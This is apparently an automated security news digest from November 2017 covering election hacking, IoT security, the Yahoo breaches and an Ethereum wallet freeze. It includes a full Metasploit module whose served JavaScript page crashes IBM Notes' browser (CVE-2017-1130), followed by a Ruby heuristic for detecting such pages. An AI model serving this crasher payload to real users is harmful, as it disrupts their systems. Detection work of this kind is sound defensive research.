IBM Lotus Notes Denial Of Service

http://ift.tt/2yIN5N5

This Metasploit module creates a malicious web page that causes a crash in IBM Lotus Notes when viewed in the native browser.

Security News

via Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

Debian Security Advisory 4021-1

http://ift.tt/2m2TDjL

Debian Linux Security Advisory 4021-1 – It was discovered that missing input validation in the Open Ticket Request System (OTRS) could result in privilege escalation by an agent with write permissions for statistics.

Security News

via Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

IBM Lotus Notes Denial Of Service

http://ift.tt/2yIN5N5

##
# This module requires Metasploit: http://ift.tt/2tGh41I
# Current source: http://ift.tt/1iQz0Mp
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => "IBM Notes Denial Of Service",
        'Description' => %q(
          This module exploits a vulnerability in the native browser
          that comes with IBM Lotus Notes.
          If successful, the browser will crash after viewing the webpage.
        ),
        'License'     => MSF_LICENSE,
        'Author'      => [
          'Dhiraj Mishra',
        ],
        'References'  => [
          ['EDB', '42604'],
          ['CVE', '2017-1130']
        ],
        'DisclosureDate' => 'Aug 31 2017',
        'Actions'        => [['WebServer']],
        'PassiveActions' => ['WebServer'],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
    # The served page drives the native file chooser in a 1 ms loop and, in
    # parallel, keeps opening child windows (tracked in `kins`) whose data:
    # URL repeats the same loop. Before each new window is opened, tracked
    # windows whose `status` property is undefined are closed and dropped.
    # The embedded Notes browser does not survive this and crashes.
    @html = %|
<html><body>
<input type="file" id="f">
<script>
var w;
var kins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
  for (var k in kins) {
    if (kins[k] && kins[k].status === undefined) {
      kins[k].close();
      delete kins[k];
    }
  }
  w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
  if (w) {
    kins[i] = w;
    i++;
  }
}, 1);
</script>
</body></html>
|
  end

  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end


# URL: http://ift.tt/2zsae3v
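
As an added example, not part of the Metasploit module or of the Packet Storm item above: a Ruby content heuristic that a web proxy or a sweep over saved page captures could run to flag HTML bodies resembling this crasher. The pattern list mirrors the payload served by the module (a file input, a setInterval-driven `.click()` loop, `open()` on a `data:text/html` URL that carries its own script); the signal names, weights, threshold and the three sample pages are constructed for this example and are not from the module or the advisory.

```ruby
# Added example, not part of the Metasploit module: a content heuristic for
# HTML bodies that resemble the IBM Notes crasher served by the module above.
# Meant for a web proxy / ICAP hook or a sweep over saved page captures.
# Sample pages, signal names and weights below are constructed for this example.

require 'cgi'

# Each signal is a pattern over the page text plus a weight (weights are an
# assumption; tune them against your own traffic).
NOTES_DOS_SIGNALS = {
  # a file chooser the script can drive
  file_input:      [/<input[^>]+type=["']?file["']?/i, 1],
  # setInterval("f.click()", 1): the file picker fired in a tight loop
  timed_click:     [/setInterval\s*\(\s*["'][^"']*\.click\(\)["']/i, 2],
  # window.open on a data:text/html URL (child windows that repeat the loop)
  data_url_window: [/open\s*\(\s*['"]data:text\/html,/i, 2],
  # the data: URL carries its own <script>
  nested_script:   [/data:text\/html,.*?<script/mi, 1],
}.freeze

# Scores one HTML body. The data: payload is often percent-encoded, so the
# body is also matched in decoded form; otherwise the inner click loop and
# script tag would be invisible to the patterns.
def score_notes_dos(html)
  text = html + "\n" + CGI.unescape(html)
  hits = NOTES_DOS_SIGNALS.select { |_, (re, _)| text =~ re }.keys
  { score: hits.sum { |k| NOTES_DOS_SIGNALS[k][1] }, hits: hits }
end

# A page is flagged when enough independent signals are present; a lone file
# input (every upload form has one) is not enough.
def notes_dos_suspicious?(html, threshold = 4)
  score_notes_dos(html)[:score] >= threshold
end

# --- constructed sample pages -------------------------------------------

# Same structure as the payload served by the module above.
CRASHER_PAGE = <<~HTML
  <html><body>
  <input type="file" id="f">
  <script>
  f.click();
  setInterval("f.click()", 1);
  setInterval(function(){
    open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
  }, 1);
  </script>
  </body></html>
HTML

# Variant with the data: URL percent-encoded and no visible outer click loop.
ENCODED_PAGE = <<~HTML
  <html><body><script>
  open('data:text/html,%3Cinput%20type%3D%22file%22%20id%3D%22f%22%3E%3Cscript%3Ef.click()%3BsetInterval(%22f.click()%22%2C%201)%3B%3C%2Fscript%3E');
  </script></body></html>
HTML

# An ordinary upload form: has a file input, nothing else.
BENIGN_UPLOAD_PAGE = <<~HTML
  <html><body>
  <form action="/upload" method="post" enctype="multipart/form-data">
    <input type="file" id="doc" name="doc">
    <button type="submit">Upload</button>
  </form>
  <script>
  document.getElementById('doc').addEventListener('change', function () { console.log('picked'); });
  </script>
  </body></html>
HTML

if $PROGRAM_NAME == __FILE__
  { crasher: CRASHER_PAGE, encoded: ENCODED_PAGE, benign: BENIGN_UPLOAD_PAGE }.each do |name, page|
    r = score_notes_dos(page)
    puts "#{name}: score=#{r[:score]} hits=#{r[:hits].inspect} flagged=#{notes_dos_suspicious?(page)}"
  end
end
```

The decode step is the part worth keeping even if the weights are changed: the whole payload can live inside the `data:` URL, percent-encoded, so a rule that only looks at the raw body sees nothing but an `open()` call.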

Security News

via Exploit Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

Data button: NRW wants warning labels for apps

http://ift.tt/2yiv9EU

Bundesrat initiative

To give consumers better warning of unnoticed data theft by smartphone apps, North Rhine-Westphalia wants to initiate a change in the law, according to a media report.

Security News

via com! professional http://ift.tt/2wN2Hwm

November 8, 2017 at 08:32AM

Have Hackers Undermined Our Faith In Democracy?

http://ift.tt/2zrBkK0

What a difference a year makes. This time last year, Twitter pooh-poohed any suggestion that Russian agents ran accounts on its platform for purposes of subverting the US election.

A month ago, it was forced to eat its words, owning up to a paltry 201 such accounts. Last week, under a Congressional grilling, that estimate jumped by an order of magnitude to more than 2,700.

Facebook, too, upped the ante, admitting that Russian-backed content may have reached not 10 million users, as previously claimed, but 126 million. Some of this, as analysis of the @TEN_GOP Twitter account suggests, was influential. But did it influence the election? That is the $64,000 question. Or, given how much Donald Trump appears to be profiting from his election as US president, perhaps the $64m question.

Not to be outdone, the UK may, finally, be asking some of the same questions. A petition politely asking the UK government to “investigate covert foreign interference in the EU referendum” was cancelled earlier this year when the general election was called. Now it is back and, having passed 10,000 signatures, requires an official (written) response.

At 100,000 signatures the petition will be considered for debate in Parliament.

Attempts at targeted influence were not restricted to US and UK votes. The same techniques appear to have been deployed during French and German elections.

These latest admissions add massively to previous concerns that, whatever covert interference took place, financiers with deep pockets were hard at work influencing the outcomes of national elections using advanced data mining techniques and targeted online messaging.

None of the above is great for democracy. All of it suggests that the influence of social media has already proven malign. Yet this focus on the indirect threat, from tactics designed to swing individual votes, may be missing a much bigger issue: the threat that partisan campaigners and hackers subvert the voting process directly, making the outcome of future elections at best dubious and, whatever the outcome, destroying the legitimacy of those elections.

This summer, The Register revealed how election-rigging has spread to the disaffected of Reddit, who masterminded a campaign to deprive lefty-leaning radio presenter James O’Brien of a Radio Times award. Their tools: batch-voting bots for Windows and JavaScript, supplemented by a Tor-based Linux app, designed to get past the meagre safeguards put in place by poll host PollDaddy.

Politically motivated? It’s hard to tell. Some hackers probably resented the regular spankings that O’Brien administers to pro-Brexit callers on his popular LBC radio show. Others, though, seemed to be doing it “for lulz”.

More serious are reports, about the same time, of trolls attempting to distort the results of the government’s first LGBT survey. According to some news outlets, this was politically motivated: far-right campaigners exploiting an opportunity to derail attempts by the Government Equalities Office to make policy more responsive to LGBT needs, while simultaneously ramping up Islamophobia.

Again, reality is likely mixed: some politics, some lulz. The end result is the same: a lot of work for data analysts weeding out spurious input; and a lingering suspicion that this survey cannot be trusted to deliver accurate insight. Because out there, in the dark spaces of the web, some of the derailers were discussing how they could more plausibly derail. This involved encouraging submissions that weren’t obvious trolls, advocating propositions with little support in the LGBT community but nonetheless credible.

But scale that up, beyond simple online polls to general elections. A year ago, Symantec demonstrated major holes in the paperless touchscreen direct-recording electronic (DRE) voting machines used in the US. But it was not until September 2017 that the US state of Virginia agreed to stop using these machines, after attendees at DEF CON’s “Voting Machine Hacking Village” flagged them as potentially vulnerable to hackers.

Explaining the decision, Department of Elections Commissioner Edgardo Cortes wrote: “The Department of Elections believes that the risks presented by using this equipment in the November General Election are sufficiently significant to warrant immediate decertification to ensure the continued integrity of Virginia elections.”

This is just the tip of the iceberg. Verified Voting surveyed systems used in the 2016 Presidential election. They found five states relying solely on DRE machines and a further eight relying on a mix of paper ballots and paperless DRE machines.

Security much?

In September 2017, the Department of Homeland Security finally confirmed that election systems in at least 21 states had been targeted by Russian hackers in the run-up to the 2016 contest. A small number of systems were breached but, the agency concluded, there was no evidence of any actual vote manipulation.

This follows revelations last year of attempts to hack voter registration systems in Arizona and Illinois. Officials were keen to stress that these involved “preparatory activity such as scanning computer systems” and that “attempts to compromise networks” were mostly unsuccessful. Given that the Illinois attack took down the system for 10 days, and some 200,000 voter details may have been compromised, that is a pretty elastic definition of “unsuccessful”.

Still, officials are clear that it is “unlikely” that any real damage was done. So we can all sleep reassured. Mostly.

The problem with digital systems is the overarching fear that everything could be blown up in one act of hacker spite.

This is compounded by the fact that we don’t know what we don’t know. A further issue with the DREs in Virginia and elsewhere is that they produce no paper trail. They have no vote-auditing capability. We are assured that they have never been hacked but if they were, how would we tell?

The real enemy in this is official complacency.

According to security expert Bruce Schneier, it may now be too late to fix the holes in some systems. He wrote: “We must ignore the machine manufacturers’ spurious claims of security, create tiger teams to test the machines – and systems – resistance to attack, drastically increase their cyber-defenses and take them offline if we can’t guarantee their security online.”

Earlier this year the hacker collective Chaos Computer Club (CCC) was shocked not only by how easily it could hack, and change, the preliminary results of the German election, but by the dismissive attitude of those tasked with safeguarding it. The hole was closed with a patch that CCC almost immediately circumvented.

The US State of Georgia has rejected offers of help to safeguard its voting system, claiming this was just scare-mongering and a power grab from the centre.

From social media to civil servants to politicians, the message is the same: nothing to worry about. A year on, we are beginning to understand how modest our fears were and that the worst may yet be to come.

There are two sets of hackers in this world: those targeting the machinery of voting and those seeking to corrupt the debate, the discourse, the atmosphere via social media. Both are united by a desire to compromise the actual voting, but they’ll happily settle for undermining confidence in the overall result. In this, thanks to complacency everywhere, they appear to be achieving their aim.

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

IoT Devices Are An Enterprise Security Time Bomb

http://ift.tt/2iFrN8s

The Internet of Things (IoT) is causing serious security concerns for enterprises worldwide, and few companies are capable of securing IoT devices because they cannot properly identify them, according to new research.

On Wednesday, ForeScout Technologies revealed the results of a new survey into the challenges IoT poses for the enterprise.

The survey, conducted by Forrester Consulting, suggests that IoT and operational technology (OT) are having a serious impact on the way businesses conduct themselves today — and pose a huge risk due to a lack of information and appropriate security practices.

According to the survey, based on responses from 603 IT and line-of-business (LoB) decision-makers involved in enterprise security teams across the US, UK, Germany, France, Australia and New Zealand, a massive 82 percent of companies are not confident about passing audits as they are unable to identify all IoT and OT devices on their networks.

To make matters worse, when asked who is responsible for the security of such devices, respondents did not have a clear answer.

In total, 54 percent of respondents said that IoT is causing serious anxiety due to security worries and the impact on the business should a failure occur, and LoB employees demonstrated more concern than IT staff at 58 percent to 51 percent respectively.

Executive skepticism was cited as a barrier to investment into IoT security solutions, alongside budget constraints. As a result of having little money to spare, 40 percent of respondents said that their companies continue to rely on traditional security approaches — which, in turn, prevent a clear view into what devices are connecting to where, and when.

This is a glaring issue for today’s firms, which need crystal-clear visibility into networks where BYOD and IoT are common. Failing to identify and isolate malicious devices or suspicious network activity places company networks and information at serious risk.

However, according to the survey, 59 percent of respondents said they were willing to tolerate a medium to high-risk level in relation to compliance requirements for IoT security — and yet, 90 percent also expect the volume of IoT devices connecting to corporate networks to rise in the next five years.

The research also says that 48 percent of respondents believe improving awareness and visibility of IoT devices should be a top priority for improving IoT security, and 82 percent expect their IoT and OT security spend to increase over the next few years.

“The survey results demonstrate a dynamic shift in the way organizations are starting to think about security and risk as it relates to IoT,” said Michael DeCesare, president, and CEO at ForeScout. “Each new device that comes online represents another attack vector for enterprises and it only takes one device to compromise an entire network and disrupt business operations, which can impact the bottom line. Securing IoT is not just a cybersecurity issue, it is a business issue and operating at any risk level is too much. Enterprises need full visibility.”

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Marissa Mayer Subpoenaed To Testify Before Senate On Yahoo Breaches

http://ift.tt/2zGsr0f

Former Yahoo CEO Marissa Mayer will testify before a Senate committee on Wednesday regarding the massive data breaches that occurred under her watch. However, she only agreed to do so after the committee compelled her appearance with a subpoena, according to reports.

A spokesperson for the Senate Commerce Committee confirmed to ZDNet that the committee issued a subpoena. However, a representative for Mayer told the Hill that she is appearing before the committee voluntarily. The spokesperson did acknowledge to the Hill that the former CEO initially suggested she was not the best witness to discuss the data breaches, which compromised billions of Yahoo accounts.

Along with Mayer, multiple other former and current executives will testify at Wednesday’s hearing on data breaches, including Karen Zacharia, deputy general counsel and chief privacy officer at Verizon (which acquired Yahoo in June); former Equifax CEO Richard Smith; interim Equifax CEO Paulino do Rego Barros, Jr.; and Entrust Datacard CEO Todd Wilkinson.

In September 2016, Yahoo disclosed the theft of 500 million records, then thought to be the largest theft of records in history. Just a few months later, the company revealed a separate theft of one billion records. Then just last month, the web giant said that effectively all 3 billion Yahoo user accounts had been affected by the 2013 breach. After Verizon’s acquisition of Yahoo was finalized in June, Mayer stepped down from the company.

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Ethereum Wallets Worth $280M Accidentally Frozen By Flaw

http://ift.tt/2Al5Um3

Digital currencies and the wallets that hold them have become an increasingly attractive target for digital pickpockets, resulting in millions of real dollars’ worth of lost currency. A $50 million heist of Ethereum currency last year exploiting weaknesses in the cryptocurrency’s underlying software threatened to break the Bitcoin competitor. But a new security bug in a popular Ethereum wallet platform has caused what amounts to a bank freeze on scores of high-value wallets. Today, Parity Technologies Ltd., the developer of cryptographic “wallets” for the digital currencies Bitcoin and Ethereum, announced that an “accidental” triggering of a bug affecting certain Parity wallets had broken them, making it impossible to transfer Ethereum funds out of them.

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Vodafone Enters The Multibillion-Dollar IoT Market

http://ift.tt/2m2W2uW

Vodafone announced news on Tuesday (Nov. 7) of its entrance into the Internet of Things (IoT) consumer market through the launch of “V by Vodafone.”

“V by Vodafone” enables consumers to connect millions of home and leisure electronics products to the company’s dedicated global IoT network, which the telecoms company said in a press release is the largest network of its kind in the world.

“The Internet of Things is already beginning to transform how businesses operate. Over the next decade, the expansion of IoT into consumer markets will bring about an equally dramatic shift in how people manage their daily lives, at home and in their leisure time,” said Vodafone Group Chief Executive Vittorio Colao in the press release. “‘V by Vodafone’ makes it simple to connect a wide range of IoT-enabled devices, helping customers keep everyone and everything that matters to them safe and secure. We look forward to applying our world-leading expertise in IoT to help consumers make the most of the next phase of the global digital revolution.”

Citing market research, Vodafone said that estimates suggest that by 2020 there will be more than 370 million consumer electronics and smart home devices capable of connecting to mobile IoT networks in the countries in which Vodafone operates, up from around 50 million today.

“V by Vodafone” is a system for consumers to connect and manage IoT devices and a product range that includes a connected car dongle, a 4G security camera, a pet location and activity tracker and a bag location tracker. To enable connected devices, Vodafone is rolling out “V-Sim by Vodafone,” a SIM card that will be shipped with IoT-enabled consumer electronics products sold by Vodafone. “V-Sim by Vodafone” will also be offered by third-party retailers next year.

There’s also the “V by Vodafone” smartphone app, which provides customers with a single and intuitive overview of all IoT-enabled products registered to their account. Next year, Vodafone said it will also launch a new online product marketplace open to IoT developers that will greatly extend product choice for customers.

Security News,IoT News

via IoT – Google News http://ift.tt/2h68U1y

November 8, 2017 at 08:25AM

Telecoms giant Vodafone makes push into internet of things consumer market

http://ift.tt/2hPRaEI

Vodafone has launched a new system that it says will allow consumers to connect “millions of home and leisure electronics products” to its dedicated global internet of things network.

In an announcement Tuesday, the business said its “V by Vodafone” system was made up of, among other things, an internet of things SIM card and a smartphone app.

The SIM card will be sent out with internet of things-enabled products sold by Vodafone, while the app will give customers an overview of all the internet of things-enabled products registered to their account.

Launch products include a location and activity tracker for pets, which allows owners to track their dogs and cats using GPS and the mobile network. Owners will get an alert on their smartphone if their pet moves away from a designated area, and will be able to monitor their animal’s sleeping patterns and movements.

The European Commission describes the internet of things as merging “physical and virtual worlds, creating smart environments.” According to analysis from the McKinsey Global Institute, the potential economic impact of the internet of things in 2025, including consumer surplus, could be anything between $3.9 trillion and $11.1 trillion.

“The internet of things is already beginning to transform how businesses operate,” Vittorio Colao, chief executive of the Vodafone Group, said in a statement Tuesday. “Over the next decade, the expansion of internet of things into consumer markets will bring about an equally dramatic shift in how people manage their daily lives, at home and in their leisure time.”

Security News,IoT News

via IoT – Google News http://ift.tt/2h68U1y

November 8, 2017 at 08:25AM